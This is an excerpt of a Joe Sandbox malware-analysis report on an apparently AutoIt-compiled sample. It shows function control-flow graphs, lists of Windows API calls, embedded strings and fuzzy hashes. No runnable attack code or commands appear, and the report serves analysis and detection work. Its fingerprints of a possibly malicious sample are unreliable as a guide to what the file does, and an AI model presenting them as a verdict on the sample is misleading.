                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                    • String ID: AU3!$EA06$SCRIPT
                                                                                                                                                                                                                    • API String ID: 3051347437-2925976212
                                                                                                                                                                                                                    • Opcode ID: f73255c4aa979fac3e714f182413f4c7844587de4428a3b007482dfb801f65cd
                                                                                                                                                                                                                    • Instruction ID: a0119d348b1a2c94c2e795094655dcc28716a73b6456808999cf4a3c18541354
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f73255c4aa979fac3e714f182413f4c7844587de4428a3b007482dfb801f65cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5191F4B2B0965186EB20CB22D444A7D37B4BB45B84F894136DE9EE7795DF3EE484C300
                                                                                                                                                                                                                    Function 00007FF656CD1D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 482 7ff656cd1d80-7ff656cd1e17 call 7ff656cb9640 GetVersionExW call 7ff656cb7cf4 487 7ff656d19450 482->487 488 7ff656cd1e1d 482->488 490 7ff656d19457-7ff656d1945d 487->490 489 7ff656cd1e20-7ff656cd1e46 call 7ff656cbdda4 488->489 495 7ff656cd1fc1 489->495 496 7ff656cd1e4c 489->496 492 7ff656d19463-7ff656d19480 490->492 492->492 494 7ff656d19482-7ff656d19485 492->494 494->489 497 7ff656d1948b-7ff656d19491 494->497 495->487 498 7ff656cd1e53-7ff656cd1e59 496->498 497->490 499 7ff656d19493 497->499 500 7ff656cd1e5f-7ff656cd1e7c 498->500 502 7ff656d19498-7ff656d194a1 499->502 500->500 501 7ff656cd1e7e-7ff656cd1e81 500->501 501->502 504 7ff656cd1e87-7ff656cd1ed6 call 7ff656cbdda4 501->504 502->498 503 7ff656d194a7 502->503 503->495 507 7ff656cd1edc-7ff656cd1ede 504->507 508 7ff656d19645-7ff656d1964d 504->508 511 7ff656cd1ee4-7ff656cd1efa 507->511 512 7ff656d194ac-7ff656d194af 507->512 509 7ff656d1965a-7ff656d1965d 508->509 510 7ff656d1964f-7ff656d19658 508->510 515 7ff656d19686-7ff656d19692 509->515 516 7ff656d1965f-7ff656d19674 509->516 510->515 517 7ff656cd1f00-7ff656cd1f02 511->517 518 7ff656d19572-7ff656d19579 511->518 513 7ff656cd1f3c-7ff656cd1f80 GetCurrentProcess IsWow64Process call 7ff656cd6240 512->513 514 7ff656d194b5-7ff656d19501 512->514 532 7ff656d1969d-7ff656d196b3 call 7ff656d232f4 513->532 538 7ff656cd1f86-7ff656cd1f8b GetSystemInfo 513->538 514->513 520 7ff656d19507-7ff656d1950e 514->520 515->532 521 7ff656d19676-7ff656d1967d 516->521 522 7ff656d1967f 516->522 525 7ff656d1959e-7ff656d195b3 517->525 526 7ff656cd1f08-7ff656cd1f0b 517->526 523 7ff656d19589-7ff656d19599 518->523 524 7ff656d1957b-7ff656d19584 518->524 530 7ff656d19510-7ff656d19518 520->530 531 7ff656d19534-7ff656d1953c 520->531 521->515 522->515 523->513 524->513 527 7ff656d195c3-7ff656d195d3 525->527 528 7ff656d195b5-7ff656d195be 525->528 533 7ff656d195ed-7ff656d195f0 526->533 534 7ff656cd1f11-7ff656cd1f2d 526->534 527->513 528->513 540 7ff656d19526-7ff656d1952f 530->540 541 7ff656d1951a-7ff656d19521 530->541 542 7ff656d1954c-7ff656d19554 531->542 543 7ff656d1953e-7ff656d19547 531->543 550 7ff656d196d7-7ff656d196dc GetSystemInfo 532->550 551 7ff656d196b5-7ff656d196d5 call 7ff656d232f4 532->551 533->513 539 7ff656d195f6-7ff656d19620 533->539 536 7ff656cd1f33 534->536 537 7ff656d195d8-7ff656d195e8 534->537 536->513 537->513 545 7ff656cd1f91-7ff656cd1fc0 538->545 546 7ff656d19630-7ff656d19640 539->546 547 7ff656d19622-7ff656d1962b 539->547 540->513 541->513 548 7ff656d19556-7ff656d1955f 542->548 549 7ff656d19564-7ff656d1956d 542->549 543->513 546->513 547->513 548->513 549->513 553 7ff656d196e2-7ff656d196ea 550->553 551->553 553->545 555 7ff656d196f0-7ff656d196f7 FreeLibrary 553->555 555->545
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                                                                                                                    • String ID: |O
                                                                                                                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                                                                                                                    • Instruction ID: 1179a81d8d5caa12079cc6de55c01502aef5dc188cc9ee139b0c549a39202661
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD19071E5D2C285F7208B20A8101753BA1BF29788F8C0B3AD58DE7661DFBEB500C751
                                                                                                                                                                                                                    Function 00007FF656D4F630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 719 7ff656d4f630-7ff656d4f69e call 7ff656cd6240 722 7ff656d4f6d4-7ff656d4f6d9 719->722 723 7ff656d4f6a0-7ff656d4f6b8 call 7ff656cbffbc 719->723 725 7ff656d4f6db-7ff656d4f6ef call 7ff656cbffbc 722->725 726 7ff656d4f71e-7ff656d4f723 722->726 732 7ff656d4f6ba-7ff656d4f6d2 call 7ff656cbffbc 723->732 733 7ff656d4f708-7ff656d4f70d 723->733 741 7ff656d4f6f3-7ff656d4f706 call 7ff656cbffbc 725->741 727 7ff656d4f736-7ff656d4f75c call 7ff656cbd4cc call 7ff656cbe330 726->727 728 7ff656d4f725-7ff656d4f729 726->728 748 7ff656d4f762-7ff656d4f7cf call 7ff656cbd4cc call 7ff656cbe330 call 7ff656cbd4cc call 7ff656cbe330 call 7ff656cbd4cc call 7ff656cbe330 727->748 749 7ff656d4f840-7ff656d4f84a 727->749 731 7ff656d4f72d-7ff656d4f732 call 7ff656cbffbc 728->731 731->727 732->741 736 7ff656d4f719-7ff656d4f71c 733->736 737 7ff656d4f70f-7ff656d4f717 733->737 736->726 736->727 737->731 741->726 741->733 799 7ff656d4f806-7ff656d4f83e GetSystemDirectoryW call 7ff656cd4c68 GetSystemDirectoryW 748->799 800 7ff656d4f7d1-7ff656d4f7f3 call 7ff656cbd4cc call 7ff656cbe330 748->800 750 7ff656d4f84c-7ff656d4f86e call 7ff656cbd4cc call 7ff656cbe330 749->750 751 7ff656d4f87d-7ff656d4f8af GetCurrentDirectoryW call 7ff656cd4c68 GetCurrentDirectoryW 749->751 750->751 769 7ff656d4f870-7ff656d4f87b call 7ff656cd8d58 750->769 759 7ff656d4f8b5-7ff656d4f8b8 751->759 762 7ff656d4f8ba-7ff656d4f8eb call 7ff656ccf688 * 3 759->762 763 7ff656d4f8f0-7ff656d4f8ff call 7ff656d2f464 759->763 762->763 776 7ff656d4f905-7ff656d4f95d call 7ff656d2fddc call 7ff656d2fca8 call 7ff656d2fafc 763->776 777 7ff656d4f901-7ff656d4f903 763->777 769->751 769->763 781 7ff656d4f964-7ff656d4f96c 776->781 806 7ff656d4f95f 776->806 777->781 783 7ff656d4f972-7ff656d4fa0d call 7ff656d1d1f8 call 7ff656cd8d58 * 3 call 7ff656cd4c24 * 3 781->783 784 7ff656d4fa0f-7ff656d4fa4b CreateProcessW 781->784 789 7ff656d4fa4f-7ff656d4fa62 call 7ff656cd4c24 * 2 783->789 784->789 811 7ff656d4fa64-7ff656d4fabc call 7ff656cb4afc * 2 GetLastError call 7ff656ccf214 call 7ff656cc13e0 789->811 812 7ff656d4fabe-7ff656d4faca CloseHandle 789->812 799->759 800->799 820 7ff656d4f7f5-7ff656d4f800 call 7ff656cd8d58 800->820 806->781 828 7ff656d4fb3b-7ff656d4fb65 call 7ff656d2f51c 811->828 815 7ff656d4facc-7ff656d4faf0 call 7ff656d2f7dc call 7ff656d30088 call 7ff656d4fb68 812->815 816 7ff656d4faf5-7ff656d4fafc 812->816 815->816 822 7ff656d4fb0c-7ff656d4fb35 call 7ff656cc13e0 CloseHandle 816->822 823 7ff656d4fafe-7ff656d4fb0a 816->823 820->759 820->799 822->828 823->828
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1787492119-0
                                                                                                                                                                                                                    • Opcode ID: 179ff2b16448044f8842acbd3d24d1ce2f36b6c32204185f73a086de7a39bf3b
                                                                                                                                                                                                                    • Instruction ID: 88062482a92eb9b8e186af007455a0f8273de610a1532319272cd98be6ff29f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179ff2b16448044f8842acbd3d24d1ce2f36b6c32204185f73a086de7a39bf3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E19122A08B8185EB10DF26D55017E77B0FBC4B84F484A35DE5DA77A9CF7AE845C740
                                                                                                                                                                                                                    Function 00007FF656D2C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                                                                                                                    • Instruction ID: 0dc46eaceab856eefded332282aa574d268bffc068a93878f3c7f3d535f9580c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F08211E18646C1EA645B24FC083386360AF85BB5F5C8B30D47F962E4DFADE898C200
                                                                                                                                                                                                                    Function 00007FF656CB7920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                                                                                                                    • API String ID: 2667193904-1575078665
                                                                                                                                                                                                                    • Opcode ID: ccdde91ff49b8a1df99aa6a2d821529d6f27c14787be887cfcf32b135e51df6f
                                                                                                                                                                                                                    • Instruction ID: ee42667b31945fed7f1d7b24d75f46d12cef552f74a6a3a109ffa8a85977ac2e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccdde91ff49b8a1df99aa6a2d821529d6f27c14787be887cfcf32b135e51df6f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5916D72A28A8395EB20DF25E8401B97374FF84784F884732E54DA7AA5DF7EE245C740
                                                                                                                                                                                                                    Function 00007FF656CB5DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 131 7ff656cb5dec-7ff656cb5e21 133 7ff656cb5e91-7ff656cb5e94 131->133 134 7ff656cb5e23-7ff656cb5e26 131->134 133->134 137 7ff656cb5e96 133->137 135 7ff656cb5e98 134->135 136 7ff656cb5e28-7ff656cb5e2f 134->136 138 7ff656cb5e9e-7ff656cb5ea3 135->138 139 7ff656cfc229-7ff656cfc261 call 7ff656ccede4 call 7ff656cd2c44 135->139 140 7ff656cb5f21-7ff656cb5f29 PostQuitMessage 136->140 141 7ff656cb5e35-7ff656cb5e3a 136->141 142 7ff656cb5e6b-7ff656cb5e76 DefWindowProcW 137->142 143 7ff656cb5ea5-7ff656cb5ea8 138->143 144 7ff656cb5ecc-7ff656cb5efa SetTimer RegisterWindowMessageW 138->144 178 7ff656cfc267-7ff656cfc26e 139->178 149 7ff656cb5ec8-7ff656cb5eca 140->149 145 7ff656cb5e40-7ff656cb5e43 141->145 146 7ff656cfc2af-7ff656cfc2c5 call 7ff656d2a40c 141->146 148 7ff656cb5e7c-7ff656cb5e90 142->148 150 7ff656cb5eae-7ff656cb5ebe KillTimer call 7ff656cb5d88 143->150 151 7ff656cfc1b8-7ff656cfc1bb 143->151 144->149 152 7ff656cb5efc-7ff656cb5f09 CreatePopupMenu 144->152 153 7ff656cb5e49-7ff656cb5e4e 145->153 154 7ff656cb5f2b-7ff656cb5f35 call 7ff656cd4610 145->154 146->149 171 7ff656cfc2cb 146->171 149->148 167 7ff656cb5ec3 call 7ff656cb7098 150->167 157 7ff656cfc1bd-7ff656cfc1c0 151->157 158 7ff656cfc1f7-7ff656cfc224 MoveWindow 151->158 152->149 160 7ff656cfc292-7ff656cfc299 153->160 161 7ff656cb5e54-7ff656cb5e59 153->161 173 7ff656cb5f3a 154->173 165 7ff656cfc1e4-7ff656cfc1f2 SetFocus 157->165 166 7ff656cfc1c2-7ff656cfc1c5 157->166 158->149 160->142 168 7ff656cfc29f-7ff656cfc2aa call 7ff656d1c54c 160->168 169 7ff656cb5e5f-7ff656cb5e65 161->169 170 7ff656cb5f0b-7ff656cb5f1f call 7ff656cb5f3c 161->170 165->149 166->169 174 7ff656cfc1cb-7ff656cfc1df call 7ff656ccede4 166->174 167->149 168->142 169->142 169->178 170->149 171->142 173->149 174->149 178->142 182 7ff656cfc274-7ff656cfc28d call 7ff656cb5d88 call 7ff656cb6258 178->182 182->142
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                    • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                                                                                                                    • Instruction ID: 70cbbccdda21ade6de30cc039dd214f25a6dd50aaa2050f54c1012b11c696da5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F5166B1A1C68381FA60AF24E84427D63A0AF45B84FCC0B31D54EE26B6CE6FF945C340
                                                                                                                                                                                                                    Function 00007FF656CB3D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 2914291525-2659433951
                                                                                                                                                                                                                    • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                                                                                                                    • Instruction ID: 359d89cdd95f6520cb0759944d07280f348428f92a3d2c9c1f5224ecdccb7638
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71316C32A08B419AF700CF60E8443A837B4FB58748F580B38CA4DA7B64DF7E9199CB40
                                                                                                                                                                                                                    Function 00007FF656CCE958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 189 7ff656cce958-7ff656cce9ae 190 7ff656cce9b4-7ff656cce9d3 mciSendStringW 189->190 191 7ff656d127e4-7ff656d127ea DestroyWindow 189->191 192 7ff656ccecbd-7ff656ccecce 190->192 193 7ff656cce9d9-7ff656cce9e3 190->193 194 7ff656d127f0-7ff656d12801 191->194 196 7ff656ccecd0-7ff656ccecf0 UnregisterHotKey 192->196 197 7ff656ccecf7-7ff656cced01 192->197 193->194 195 7ff656cce9e9 193->195 200 7ff656d12803-7ff656d12806 194->200 201 7ff656d12835-7ff656d1283f 194->201 199 7ff656cce9f0-7ff656cce9f3 195->199 196->197 202 7ff656ccecf2 call 7ff656ccf270 196->202 197->193 198 7ff656cced07 197->198 198->192 204 7ff656ccecb0-7ff656ccecb8 call 7ff656cb5410 199->204 205 7ff656cce9f9-7ff656ccea08 call 7ff656cb3aa8 199->205 206 7ff656d12808-7ff656d12811 call 7ff656cb8314 200->206 207 7ff656d12813-7ff656d12817 FindClose 200->207 201->194 203 7ff656d12841 201->203 202->197 215 7ff656d12846-7ff656d1284f call 7ff656d48c00 203->215 204->199 220 7ff656ccea0f-7ff656ccea12 205->220 209 7ff656d1281d-7ff656d1282e 206->209 207->209 209->201 214 7ff656d12830 call 7ff656d33180 209->214 214->201 215->220 220->215 221 7ff656ccea18 220->221 223 7ff656ccea1f-7ff656ccea22 221->223 224 7ff656d12854-7ff656d1285d call 7ff656d246cc 223->224 225 7ff656ccea28-7ff656ccea32 223->225 224->223 226 7ff656d12862-7ff656d12873 225->226 227 7ff656ccea38-7ff656ccea42 225->227 232 7ff656d1287b-7ff656d12885 226->232 233 7ff656d12875 FreeLibrary 226->233 229 7ff656d1288c-7ff656d1289d 227->229 230 7ff656ccea48-7ff656ccea76 call 7ff656cc13e0 227->230 235 7ff656d128c9-7ff656d128d3 229->235 236 7ff656d1289f-7ff656d128c2 VirtualFree 229->236 242 7ff656cceabf-7ff656cceacc OleUninitialize 230->242 243 7ff656ccea78 230->243 232->226 234 7ff656d12887 232->234 233->232 234->229 235->229 240 7ff656d128d5 235->240 236->235 238 7ff656d128c4 call 7ff656d3321c 236->238 238->235 245 7ff656d128da-7ff656d128de 240->245 242->245 246 7ff656ccead2-7ff656ccead9 242->246 244 7ff656ccea7d-7ff656cceabd call 7ff656ccf1c4 call 7ff656ccf13c 243->244 244->242 245->246 248 7ff656d128e4-7ff656d128ef 245->248 249 7ff656cceadf-7ff656cceaea 246->249 250 7ff656d128f4-7ff656d12903 call 7ff656d331d4 246->250 248->246 251 7ff656cceaf0-7ff656cceb22 call 7ff656cba07c call 7ff656ccf08c call 7ff656cb39bc 249->251 252 7ff656cced09-7ff656cced18 call 7ff656cd42a0 249->252 260 7ff656d12905 250->260 273 7ff656cceb24-7ff656cceb29 call 7ff656cd4c24 251->273 274 7ff656cceb2e-7ff656ccebc4 call 7ff656cb39bc call 7ff656cba07c call 7ff656cb45c8 * 2 call 7ff656cba07c * 3 call 7ff656cc13e0 call 7ff656ccee68 call 7ff656ccee2c * 3 251->274 252->251 265 7ff656cced1e 252->265 266 7ff656d1290a-7ff656d12919 call 7ff656d23a78 260->266 265->252 272 7ff656d1291b 266->272 277 7ff656d12920-7ff656d1292f call 7ff656cce4e4 272->277 273->274 274->266 316 7ff656ccebca-7ff656ccebdc call 7ff656cb39bc 274->316 283 7ff656d12931 277->283 287 7ff656d12936-7ff656d12945 call 7ff656d33078 283->287 292 7ff656d12947 287->292 295 7ff656d1294c-7ff656d1295b call 7ff656d331a8 292->295 301 7ff656d1295d 295->301 304 7ff656d12962-7ff656d12971 call 7ff656d331a8 301->304 310 7ff656d12973 304->310 310->310 316->277 319 7ff656ccebe2-7ff656ccebec 316->319 319->287 320 7ff656ccebf2-7ff656ccec08 call 7ff656cba07c 319->320 323 7ff656ccec0e-7ff656ccec18 320->323 324 7ff656cced20-7ff656cced25 call 7ff656cd4c24 320->324 326 7ff656ccec8a-7ff656cceca9 call 7ff656cba07c call 7ff656cd4c24 323->326 327 7ff656ccec1a-7ff656ccec24 323->327 324->191 337 7ff656ccecab 326->337 327->295 330 7ff656ccec2a-7ff656ccec3b 327->330 330->304 332 7ff656ccec41-7ff656cced71 call 7ff656cba07c * 3 call 7ff656ccee10 call 7ff656cced8c 330->332 347 7ff656d12978-7ff656d12987 call 7ff656d3d794 332->347 348 7ff656cced77-7ff656cced88 332->348 337->327 351 7ff656d12989 347->351 351->351
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                    • API String ID: 1992507300-3243417748
                                                                                                                                                                                                                    • Opcode ID: 5806ba81a6394c6c6bc24e0a403329b104b23ccda43142fd0edcef9136b173bc
                                                                                                                                                                                                                    • Instruction ID: 0fcbd5ba710e8ee717e85e27c61645cdd744e7160fd7e7079abc7d7e4ec7455a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5806ba81a6394c6c6bc24e0a403329b104b23ccda43142fd0edcef9136b173bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DE14C62B49A4281FE58EB16C56027C2370BF89B84F4C4675DB1EB7291DF7EE862C700
